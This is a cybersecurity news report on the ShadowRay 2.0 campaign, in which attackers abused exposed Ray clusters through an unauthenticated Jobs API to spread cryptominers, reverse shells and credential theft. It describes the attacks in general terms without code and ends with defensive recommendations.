ShadowRay 2.0: AI Orchestration Framework Ray Hacked for Autonomous Cryptojacking
A new wave of attacks targeting infrastructure built around modern machine-learning systems has been uncovered by the Oligo Security team. Researchers found that a group of threat actors has launched a large-scale operation, dubbed ShadowRay 2.0, in which AI-driven tools are turned against the very platforms responsible for orchestrating computational workloads. The campaign focuses on publicly accessible instances of Ray — a widely used framework for distributed task execution deployed across commercial and research environments alike.
According to Oligo, the attacks exploit CVE-2023-48022, a vulnerability known since 2023 and caused by the absence of authentication in the Ray Jobs API. The creators of Ray treat this behavior as an architectural assumption, intended for use in tightly controlled environments. In practice, however, many organizations deploy Ray on public servers, inadvertently creating favorable conditions for infrastructure compromise. Over the past two years, the number of exposed Ray instances has surpassed two hundred thousand, and a portion of them is already compromised.
Throughout the campaign, the attackers — operating under the alias IronErn440 — employed techniques more typical of DevOps teams: malicious logic was distributed through GitLab and GitHub, continuously updated depending on region, hardware type, and node configuration.
Oligo documented several attack waves. The first involved placing malicious updates on GitLab, but once the repository was removed, the attackers swiftly migrated their infrastructure to GitHub, created new accounts, and resumed distribution of their tooling.
A central element of the operation was autonomous propagation across Ray clusters: the attackers leveraged legitimate orchestration mechanisms to schedule malicious tasks on every node. These chains included reconnaissance, stealthy installation of cryptocurrency miners, creation of reverse-shell channels, and deployment of persistence mechanisms. They relied on processes disguised as system services and covert GPU utilization for mining workloads, which remained invisible to Ray’s monitoring tools.
Signs of competition between criminal groups were observed inside compromised environments: IronErn440’s miners actively terminated rival processes, blocked their addresses, and rewrote network-filtering rules. In some cases, operators of the campaign gained access to sensitive information, including cloud service keys, application parameters, trained models, and databases — extending the threat well beyond illicit crypto-mining. Certain nodes even showed attempts to repurpose compromised resources for DDoS attacks.
The investigation suggests the operation may have persisted for over a year and affected infrastructure across multiple continents. The growing number of exposed Ray servers and the absence of a proper fix for the vulnerability created conditions for recurring exploitation and rapid evolution of attack methods.
Experts emphasize that the underlying issue remains deployment misconfigurations and lack of isolation, as Ray was never designed for exposure to the open internet. Recommended measures include auditing configurations with Anyscale tools, restricting access to the Ray dashboard, enforcing network-level filtering, and closely monitoring anomalies within computational environments.
Support Our Threat Intelligence
If you find our technology report and cybersecurity news helpful, consider supporting our work.
Buy Me a Coffee
PayPal
